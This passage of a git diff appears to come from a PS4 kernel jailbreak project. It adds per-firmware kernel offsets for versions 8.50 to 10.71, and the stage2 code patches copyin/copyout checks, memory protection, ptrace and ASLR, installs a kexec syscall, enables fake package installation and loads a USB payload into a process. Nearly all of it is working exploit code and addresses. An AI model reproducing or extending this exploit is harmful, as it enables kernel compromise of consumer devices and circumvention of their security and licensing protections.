kdlsym_addr_uart_patch 0xffffffff83c78a78 +#define kdlsym_addr_veri_patch 0xffffffff8281e864 + + +#elif (FIRMWARE == 1050 || FIRMWARE == 1070 || FIRMWARE == 1071) // FW 10.50 / 10.70 / 10.71 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 + +#define kdlsym_addr_pppoe_softc_list 0xffffffff844514b8 + +#define kdlsym_addr_cc_cpu 0xffffffff8444e340 +#define kdlsym_addr_callwheelsize 0xffffffff84450340 + +#define kdlsym_addr_nd6_llinfo_timer 0xffffffff8262dbf0 + +#define kdlsym_addr_Xill 0xffffffff823b5810 +#define kdlsym_addr_setidt 0xffffffff82341470 + +#define kdlsym_addr_kernel_map 0xffffffff844a9250 +#define kdlsym_addr_kmem_alloc 0xffffffff82628960 + +#define kdlsym_addr_kproc_create 0xffffffff825ab490 +#define kdlsym_addr_kproc_exit 0xffffffff825ab700 + +#define kdlsym_addr_ksock_create 0xffffffff824160e0 +#define kdlsym_addr_ksock_close 0xffffffff82416150 +#define kdlsym_addr_ksock_bind 0xffffffff82416160 +#define kdlsym_addr_ksock_recv 0xffffffff824164c0 + +#define kdlsym_addr_uart_patch 0xffffffff83c3bca0 +#define kdlsym_addr_veri_patch 0xffffffff82827db4 + + #elif FIRMWARE == 1100 // FW 11.00 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 @@ -64,6 +211,7 @@ #define kdlsym_addr_uart_patch 0xffffffff8372cff8 #define kdlsym_addr_veri_patch 0xffffffff82823f64 + #else #error "Invalid firmware" diff --git a/stage2/Makefile b/stage2/Makefile index 668f3696..87c25173 100644 --- a/stage2/Makefile +++ b/stage2/Makefile @@ -6,7 +6,7 @@ OBJCOPY = objcopy CFLAGS = -DSMP -isystem ../freebsd-headers/include -Wl,--build-id=none -Os -fno-stack-protector LDFLAGS = -T linker.ld -nostartfiles -nostdlib -ifneq ($(filter $(FW), 900 1100),) +ifneq ($(filter $(FW), 850 900 903 904 950 960 1000 1001 1050 1070 1071 1100),) CFLAGS += -DFIRMWARE=$(FW) else $(error "Invalid firmware") diff --git a/stage2/offsets.h b/stage2/offsets.h index a11ac0a4..0337c9e7 100644 --- a/stage2/offsets.h +++ b/stage2/offsets.h @@ -9,7 +9,32 @@ #define __OFFSETS_H__ #define ENABLE_DEBUG_MENU 1 -#if FIRMWARE == 900 // FW 9.00 + +#if FIRMWARE == 850 // FW 8.50 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 + +#define kdlsym_addr_printf 0xffffffff8235d570 + +#define kdlsym_addr_sysent 0xffffffff832fc5c0 + +#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 // Identical to 9.00 +#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 // Identical to 9.00 +#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 // Identical to 9.00 +#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 // Identical to 9.00 + +#define kdlsym_addr_copyin_patch1 0xffffffff825a4337 +#define kdlsym_addr_copyin_patch2 0xffffffff825a4343 + +#define kdlsym_addr_copyout_patch1 0xffffffff825a4242 +#define kdlsym_addr_copyout_patch2 0xffffffff825a424e + +#define kdlsym_addr_copyinstr_patch1 0xffffffff825a47e3 +#define kdlsym_addr_copyinstr_patch2 0xffffffff825a47ef +#define kdlsym_addr_copyinstr_patch3 0xffffffff825a4820 + + +#elif FIRMWARE == 900 // FW 9.00 #if ENABLE_DEBUG_MENU #define enable_data_mount_patch 0x0032079B @@ -86,6 +111,173 @@ #define kdlsym_addr_copyinstr_patch2 0xffffffff82471baf #define kdlsym_addr_copyinstr_patch3 0xffffffff82471be0 + +#elif (FIRMWARE == 903 || FIRMWARE == 904) // FW 9.03/9.04 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 // Identical to 9.00 + +#define kdlsym_addr_printf 0xffffffff822b79e0 + +#define kdlsym_addr_sysent 0xffffffff832fc310 + +#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 // Identical to 9.00 +#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 // Identical to 9.00 +#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 // Identical to 9.00 +#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 // Identical to 9.00 + +#define kdlsym_addr_copyin_patch1 0xffffffff82471377 +#define kdlsym_addr_copyin_patch2 0xffffffff82471383 + +#define kdlsym_addr_copyout_patch1 0xffffffff82471282 +#define kdlsym_addr_copyout_patch2 0xffffffff8247128e + +#define kdlsym_addr_copyinstr_patch1 0xffffffff82471823 +#define kdlsym_addr_copyinstr_patch2 0xffffffff8247182f +#define kdlsym_addr_copyinstr_patch3 0xffffffff82471860 + + +#elif (FIRMWARE == 950 || FIRMWARE == 960) // FW 9.50 / 9.60 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 +#define kdlsym_addr_printf 0xffffffff82405470 + +#define kdlsym_addr_sysent 0xffffffff832f92f0 + +#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 +#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 +#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 +#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 + +#define kdlsym_addr_copyin_patch1 0xffffffff82401f07 +#define kdlsym_addr_copyin_patch2 0xffffffff82401f13 + +#define kdlsym_addr_copyout_patch1 0xffffffff82401e12 +#define kdlsym_addr_copyout_patch2 0xffffffff82401e1e + +#define kdlsym_addr_copyinstr_patch1 0xffffffff824023b3 +#define kdlsym_addr_copyinstr_patch2 0xffffffff824023bf +#define kdlsym_addr_copyinstr_patch3 0xffffffff824023f0 + + +#elif (FIRMWARE == 1000 || FIRMWARE == 1001) // FW 10.00/10.01 + +#if ENABLE_DEBUG_MENU +// ShellCore offsets +#if FIRMWARE == 1001 +#define enable_data_mount_patch 0x0031b320 // 1 +#define enable_fpkg_patch 0x003d26bf // 1 +#define fake_free_patch 0x00fb08d9 // 1 +#define pkg_installer_patch 0x009f1601 // 1 +#define ext_hdd_patch 0x0060500d // 1 + +#define sceKernelIsGenuineCEX 0x0016b6a4 +#define sceKernelIsGenuineCEX_1 0x008594c4 +#define sceKernelIsGenuineCEX_2 0x008a8602 +#define sceKernelIsGenuineCEX_3 0x00a080b4 +#define dipsw_libSceDipsw 0x0016b6d2 +#define dipsw_libSceDipsw_1 0x00247e5c +#define dipsw_libSceDipsw_2 0x008594f2 +#define dipsw_libSceDipsw_3 0x00a080e2 +#else // FIRMWARE == 1000 +#define enable_data_mount_patch 0x0031b310 +#define enable_fpkg_patch 0x003d26af +#define fake_free_patch 0x00fb08b9 +#define pkg_installer_patch 0x009f15e1 +#define ext_hdd_patch 0x00604ffd + +#define sceKernelIsGenuineCEX 0x0016b694 +#define sceKernelIsGenuineCEX_1 0x008594b4 +#define sceKernelIsGenuineCEX_2 0x008a85f2 +#define sceKernelIsGenuineCEX_3 0x00a08094 +#define dipsw_libSceDipsw 0x0016b6c2 +#define dipsw_libSceDipsw_1 0x00247e4c +#define dipsw_libSceDipsw_2 0x008594e2 +#define dipsw_libSceDipsw_3 0x00a080c2 +#endif + +// debug menu libkernel_sys.prx +#define sys_debug_menu 0x1ce50 +#define sys_debug_menu_1 0x1d1b0 +#endif + +// libkernel_sys.srpx +#define _scePthreadAttrInit_offset 0x13e20 +#define _scePthreadAttrSetstacksize_offset 0x13e40 +#define _scePthreadCreate_offset 0x14260 +#define _thr_initial_offset 0x8e830 + +//kern +#define vm_map_protect_p 0x39207B +#define ptrace_p 0x44E625 +#define ptrace_p2 0x44EB11 +#define disable_aslr_p 0x3BF3A4 +#define sceSblACMgrIsAllowedSystemLevelDebugging_p 0x4497F0 +#define kemem_2 0x33B114 +#define kemem_1 0x33B10C + +#define vm_map_lock_offset 0x38CF20 +#define vm_map_insert_offset 0x38E270 +#define vm_map_unlock_offset 0x38CF90 +#define malloc_offset 0x109A60 +#define free_offset 0x109C20 +#define vm_map_lock_read_offset 0x38D070 +#define vm_map_unlock_read_offset 0x38D0C0 +#define vm_map_lookup_entry_offset 0x38D6B0 +#define M_TEMP_offset 0x1532C00 +#define proc_rmem_offset 0x44DC40 +#define vm_map_findspace_offset 0x390130 +#define vm_map_delete_offset 0x38FB70 +#define create_thread_offset 0x182F0 +#define all_proc_offset 0x22D9B40 // Address not in memory ? +#define sys_dynlib_dlsym_p 0x19025f +#define sys_dynlib_dlsym_p2 0x1bea40 + +/* kernel offsets */ + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 +#define kdlsym_addr_printf 0xffffffff822c50f0 + +#define kdlsym_addr_sysent 0xffffffff83302d90 + +#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 +#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 +#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 +#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 + +#define kdlsym_addr_copyin_patch1 0xffffffff82672f67 +#define kdlsym_addr_copyin_patch2 0xffffffff82672f73 + +#define kdlsym_addr_copyout_patch1 0xffffffff82672e72 +#define kdlsym_addr_copyout_patch2 0xffffffff82672e7e + +#define kdlsym_addr_copyinstr_patch1 0xffffffff82673413 +#define kdlsym_addr_copyinstr_patch2 0xffffffff8267341f +#define kdlsym_addr_copyinstr_patch3 0xffffffff82673450 + + +#elif (FIRMWARE == 1050 || FIRMWARE == 1070 || FIRMWARE == 1071) // FW 10.50 / 10.70 / 10.71 + +#define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 +#define kdlsym_addr_printf 0xffffffff82650e80 + +#define kdlsym_addr_sysent 0xffffffff833029c0 + +#define kdlsym_addr_amd_syscall_patch1 0xffffffff82200490 +#define kdlsym_addr_amd_syscall_patch2 0xffffffff822004b5 +#define kdlsym_addr_amd_syscall_patch3 0xffffffff822004b9 +#define kdlsym_addr_amd_syscall_patch4 0xffffffff822004c2 + +#define kdlsym_addr_copyin_patch1 0xffffffff822d75b7 +#define kdlsym_addr_copyin_patch2 0xffffffff822d75c3 + +#define kdlsym_addr_copyout_patch1 0xffffffff822d74c2 +#define kdlsym_addr_copyout_patch2 0xffffffff822d74ce + +#define kdlsym_addr_copyinstr_patch1 0xffffffff822d7a63 +#define kdlsym_addr_copyinstr_patch2 0xffffffff822d7a6f +#define kdlsym_addr_copyinstr_patch3 0xffffffff822d7aa0 + + #elif FIRMWARE == 1100 // FW 11.00 #define kdlsym_addr_Xfast_syscall 0xffffffff822001c0 @@ -115,7 +307,7 @@ #define enable_data_mount_patch 0x31F070// 1 #define enable_fpkg_patch 0x3D7C9F // 1 #define fake_free_patch 0x0FC8439 // 1 -#define pkg_installer_patch 0xA06C10 // 1 +#define pkg_installer_patch 0xA06C11 // 1 #define ext_hdd_patch 0x60E17D // 1 #define sceKernelIsGenuineCEX 0x16B664 // @@ -161,6 +353,7 @@ #define create_thread_offset 0x00295170 #define all_proc_offset 0x022D0A98 + #else #error "Invalid firmware" diff --git a/stage2/stage2.c b/stage2/stage2.c index b5383f5b..dc6caf19 100644 --- a/stage2/stage2.c +++ b/stage2/stage2.c @@ -15,6 +15,12 @@ extern int32_t payloadbin_size; struct sysent *sysents; +size_t strlen(const char * s) { + const char * t = s; + while (* t) + t++; + return t - s; +} int memcmp(const void * str1, const void * str2, size_t count) { @@ -99,7 +105,14 @@ struct sce_proc * proc_find_by_name(uint8_t * kbase, return NULL; } + #define USB_LOADER 1 + +#if FIRMWARE == 1000 || FIRMWARE == 1001 // Temporary dirty hack for 10.0x + #define ENABLE_DEBUG_MENU 1 + #define USB_LOADER 0 +#endif + #if USB_LOADER static int ksys_read(struct thread * td, int fd, void * buf, size_t nbytes) { int( * sys_read)(struct thread * , struct read_args * ) = @@ -118,6 +131,7 @@ static int ksys_read(struct thread * td, int fd, void * buf, size_t nbytes) { return td -> td_retval[0]; } #endif + #if ENABLE_DEBUG_MENU int shellui_patch(struct thread * td, uint8_t * kbase) { uint8_t * libkernel_sys_base = NULL, @@ -317,6 +331,7 @@ int shellcore_fpkg_patch(struct thread * td, uint8_t * kbase) { return ret; } #endif + #define SYS_kexec 11 struct sys_kexec_args { @@ -326,7 +341,6 @@ struct sys_kexec_args { static int sys_kexec(struct thread * td, struct sys_kexec_args * uap) { return uap -> fptr(uap -> arg); - } void stage2(void) { @@ -370,6 +384,7 @@ void stage2(void) { *(uint16_t * ) kdlsym(copyinstr_patch3) = 0x9090; #if !ENABLE_DEBUG_MENU + printf("Patching vm_map_protect, ptrace, ASLR and kmem_alloc\n"); // patch vm_map_protect check @@ -390,7 +405,7 @@ void stage2(void) { *(uint8_t * )(kbase + kemem_2) = VM_PROT_ALL; #if FIRMWARE == 1100 // FW 11.00, only neeeded for 11.00 - kmem = (uint8_t *)&kbase[0x1E4C33]; + kmem = (uint8_t *)&kbase[0x1E4C33]; // Move to offsets.h? kmem[0] = 0x90; kmem[1] = 0x90; kmem[2] = 0x90; @@ -436,7 +451,23 @@ void stage2(void) { kmem[2] = 0xEB; kmem[3] = 0x01; #endif + #else + +#if FIRMWARE == 1000 || FIRMWARE == 1001 // FW 10.0x, 9.00 already has goldhen + // Patch debug setting errors + kmem = (uint8_t *)&kbase[0x004ec908]; + kmem[0] = 0x00; + kmem[1] = 0x00; + kmem[2] = 0x00; + kmem[3] = 0x00; + + kmem = (uint8_t *)&kbase[0x004ed9ce]; + kmem[0] = 0x00; + kmem[1] = 0x00; + kmem[2] = 0x00; + kmem[3] = 0x00; +#endif #if FIRMWARE == 1100 // FW 11.00, 9.00 already has goldhen // Patch debug setting errors kmem = (uint8_t *)&kbase[0x004EE328]; @@ -451,6 +482,7 @@ void stage2(void) { kmem[2] = 0x00; kmem[3] = 0x00; #endif + #endif // Install kexec syscall 11 @@ -508,10 +540,10 @@ void stage2(void) { return 0; #endif - #if USB_LOADER - void* buffer = NULL; - void (*free)(void * ptr, int type) = (void *)(kbase + free_offset); - void* M_TEMP = (void *)(kbase + M_TEMP_offset); +#if USB_LOADER + void* buffer = NULL; + void (*free)(void * ptr, int type) = (void *)(kbase + free_offset); + void* M_TEMP = (void *)(kbase + M_TEMP_offset); void * ( * malloc)(unsigned long size, void * type, int flags) = (void * )(kbase + malloc_offset); fd = ksys_open(td, "/mnt/usb0/payload.bin", O_RDONLY, 0); if (fd < 0) @@ -569,7 +601,7 @@ return 0; printf("Writing payload...\n"); // write the payload #if USB_LOADER - // r = proc_write_mem(td, kbase, p, (void * ) PAYLOAD_BASE, buffer, payload_size, NULL); + // r = proc_write_mem(td, kbase, p, (void * ) PAYLOAD_BASE, buffer, payload_size, NULL); struct iovec iov; struct uio uio; @@ -626,4 +658,4 @@ return 0; ksys_write(td, fd, & notify, sizeof(notify)); ksys_close(td, fd); } -} \ No newline at end of file +}